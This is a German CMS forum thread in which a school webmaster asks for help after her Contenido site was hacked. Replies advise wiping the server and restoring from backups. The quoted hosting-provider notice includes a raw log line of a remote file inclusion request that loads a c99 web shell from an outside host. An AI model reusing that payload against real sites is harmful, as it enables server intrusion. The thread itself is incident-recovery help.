Seite 1 von 1

Daten retten

Verfasst: So 6. Mai 2007, 09:30
von Katja
Hallo,
letzte Woche habe ich die anhängende Mail von 1und1 erhalten. Nun hat es auch unsere alte Contenidoversion erwischt mit einem Crackversuch. Gestern konnte ich Contenido 4.6.15 sowohl auf das alte updaten als auch nebenzu auf eine zweite Datenbank erfolgreich installieren. ABER: Meine alten Daten sind weg. Ich kann nicht mehr darauf zugreifen. Nun ist mein Durchblick leider nicht so weit, dass ich die php-Dateien untersuchen könnte. Anhängend auch alle Fehlermeldungen.
Hier sieht man das derzeitige Ergebnis im Frontend:
www.sfz-ulrichschule.de (nach erfolgreichem Update)
Da sitzt doch wohl irgendwo noch was, was nicht dahin gehört, oder?
Kann mir jemand bitte, bitte einen Tipp geben, was ich machen kann, um meine alten Daten zu retten? Einen neuen Mandanten in der zweiten, neuen Contenidoversion kann ich auch nicht anlegen und dann auf die alten Daten verweisen. Das will er auch nicht.
Es handelt sich um unsere Schulhomepage.

Vielen Dank
Katja

(Übrigens: die www.ak-grundschule.de ist vor langer Zeit mit viel Hilfe von euch entstanden und wird nun von einer Firma ein wenig mitbetreut hinsichtlich des Servers; wir haben monatlich 100 000 Zugriffe und ich freue mich immer wieder, dass es so was wie Contenido und euch gibt )


.......wir registrierten vor kurzem einen Crackversuch auf unseren Servern, der
von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch
Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum
Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer
Zugriff auf Ihre Daten erhalten konnte.

Bitte prüfen Sie die Inhalte Ihrer Präsenz und ändern Sie Ihre
Passwörter. Wir empfehlen Ihnen, schnellstmöglich Ihre Scripte zu
überarbeiten, um solche Probleme so weit wie möglich auszuschliessen.

Es handelt sich um das Script "/contenido/conlib/local.php", welches
über den Parameter "cfg[path][contenido]" die Ausführung beliebigen
Codes erlaubt.

190.47.94.60 - - [27/Apr/2007:23:46:05 +0200] "POST
//contenido/conlib/local.php?cfg%5Bpath%5D%5Bcontenido%5D=http%3A%2F%2Fu
suarios.lycos.es%2Fhugo2007%2Fc99.txt%3F&act=ls&d=%2Fhomepages%2F9%2Fd39
086713%2Fhtdocs%2Fcontenido%2F&sort=0a HTTP/1.1" 200 4408
www.sfz-ulrichschule.de
"http://www.sfz-ulrichschule.de//conteni ... g%5Bpath%5
D%5Bcontenido%5D=http%3A%2F%2Fusuarios.lycos.es%2Fhugo2007%2Fc99.txt%3F&
act=ls&d=%2Fhomepages%2F9%2Fd39086713%2Fhtdocs%2Fcontenido%2F&sort=0a"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.8.1.3)
Gecko/20070309 Firefox/2.0.0.3 MEGAUPLOAD 1.0" "-"

.....

Meldung im Frontend:
Fatal error: Call to undefined function: cinclude() in /homepages/9/d39086713/htdocs/contenido/cms/front_content.php on line 18

Meldung im Backend:
Fatal error: Call to undefined function: cinclude() in /homepages/9/d39086713/htdocs/contenido/contenido/index.php on line 18

Verfasst: So 6. Mai 2007, 10:04
von wosch
Hier findest du Informationen wer und welcher Art der Hack ist.

http://support.artfiles.de/board/thread ... eadid=3062

Dann lese mal diesen Thread hier:

http://www.contenido.de/forum/viewtopic.php?t=15419

Die Lösung für dein Problem dürfte im letzten Beitrag von mir stehen.

Noch ein Nachtrag:
Sei sehr kritisch mit allem was Flash ist, der Exploit nutzt dort eine Lücke um sich zu installieren.
Solltest du die Dateien vorher sichern wollen wird dein Virenscanner (falls aktuell) anschlagen mit einem Backdoor-Trojaner. :wink:

Daten retten

Verfasst: So 6. Mai 2007, 12:04
von Katja
Hallo Wosch,
vielen Dank für die schnelle Antwort. Nachdem nun auch die neuen Version des Contenido nicht mehr mag, werde ich wohl alles platt machen. Da waren Dateien auf dem Server:
session_cleanup.php.job u.a., die mir komisch erscheinen.
Da ich aber keine aktuelle Datensicherung habe und auf die Daten auf dem Server nicht mehr komme, nützt wahrscheinlich alles nichts. Ab an die Arbeit und niedermachen.
Selbst Schuld, wenn man nicht ordenlich sichert. Aber dazu müsste ich mich erst einarbeiten, ob ich die Datenbank auch sichern muss, ob es rein, den Server zu sichern usw.

Viele Grüße
Katja

Verfasst: So 6. Mai 2007, 12:38
von wosch
Normalerweise sind alle wichtigen Daten von Contenido in der DB.
Wenn du die sicherst, ggf. mal deinen Hosterfragen ob er noch eine jüngere Sicherung hat und die, nach dem "Plattmachen" wieder einspielt,
kannst du, zumindest was die Inhalte von Condenido betrifft, mit dem Aufspielen einer sauberen Condenito-Version und Migration alles wiederherstellen.

Plattmachen ist deswegen notwendig weil du nicht weißt was an zusätzlichen Dateien auf dem Server ist, bzw. was an zusätzlichen Funktionen in die Original-Condenido Dateien geändert wurde.

Und Plattmachen heißt alles, wirklich alles löschen, nicht nur Contenido-Dateien/Verzeichnisse.

Das Script kann sehr viel auf einem Server, und wenn es der Provider den Server nicht sehr gut abgesichert hat, bis in die root eingreifen.

Der Angriff dürfte nicht dir gegolten haben sondern dem Server.
Das Script ist schon älter, so etwa 2006, halbwegs neu an deinem Hack ist eher das es in Verbindung mit einem Exploit verwendet wurde.

Von da her ist es auch nicht möglich zu erkennen ob es Script-Kiddys waren oder organisierte Cyperkriminelle.

Daten retten

Verfasst: So 6. Mai 2007, 13:08
von Katja
Hallo Wosch,
vielen Dank für deine Hilfe. Ich lösche gerade die Contenido-Verzeichnisse. Die Datenbanken habe ich schon gelöscht. Das Ganze liegt bei 1und1. Ansonsten laufen keine Datenbanken oder Php-Skripten bei mir. Es sind nur noch Bilder und ein paar Html-Seiten auf dem Server bei uns. Meinst du, dass es auch bei 1und1 gefährlich ist, wenn ich diese restlichen Daten auf dem Server lasse?

Viele Grüße
Katja

Re: Daten retten

Verfasst: So 6. Mai 2007, 13:38
von wosch
Katja hat geschrieben:Die Datenbanken habe ich schon gelöscht.
Hoffentlich hast du sie vorher gesichert, sonst wird es schwierig mit der Wiederherstellung
Katja hat geschrieben: Meinst du, dass es auch bei 1und1 gefährlich ist, wenn ich diese restlichen Daten auf dem Server lasse?
Ich kann es nicht aus der ferne beurteilen. Löschen ist der sichere Weg.
Alles andere erinnert an Lotterie-Spiel.

Hol dir die Dateien auf deinem PC, prüfe sie sehr, sehr gründlich.

Verfasst: So 6. Mai 2007, 20:34
von Halchteranerin
Hey Katja, lange nichts mehr von dir gelesen. Ufff, wirklich schade um die vielen Daten. :(